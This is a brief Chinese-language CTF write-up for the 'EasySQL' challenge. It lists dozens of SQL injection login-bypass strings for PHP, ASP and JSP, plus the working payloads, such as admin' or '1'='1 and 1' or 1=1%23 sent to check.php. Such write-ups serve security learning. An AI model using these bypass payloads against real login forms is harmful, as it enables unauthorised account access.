[极客大挑战 2019]EasySQL
这是一道sql注入的题
进入题目 两个输入框 用户名,密码
猜测弱密码,admin passwd 不行
输入’报错 可以注入
这里可以用万能密码注入
php
'or 1=1/<br/>"or "a"="a<br/>"or 1=1--<br/>"or"="<br/>"or"="a'='a<br/>"or1=1--<br/>"or=or"<br/>''or'='or'<br/>') or ('a'='a<br/>'.).or.('.a.'='.a<br/>'or 1=1<br/>'or 1=1--<br/>'or 1=1/<br/>'or"="a'='a<br/>'or' '1'='1'<br/>'or''='<br/>'or''=''or''='<br/>'or'='1'<br/>'or'='or'<br/>'or.'a.'='a<br/>'or1=1--<br/>1'or'1'='1<br/>a'or' 1=1--<br/>a'or'1=1--<br/>or 'a'='a'<br/>or 1=1--<br/>or1=1--
asp
"or "a"="a<br/>'.).or.('.a.'='.a <br/>or 1=1--<br/>'or 1=1--<br/>a'or' 1=1--<br/>"or 1=1--<br/>'or.'a.'='a<br/>"or"="a'='a<br/>'or''='<br/>or'='or'
jsp
1'or'1'='1<br/>admin' or 1=1/*
猜测sql语句
username=’uesrname’ and passwd=’password’
构造payload
username=admin' or '1'='1&password=admin' or '1'='1
check.php?username=1' or 1=1%23&password=1
1后面’和前面的闭合
成功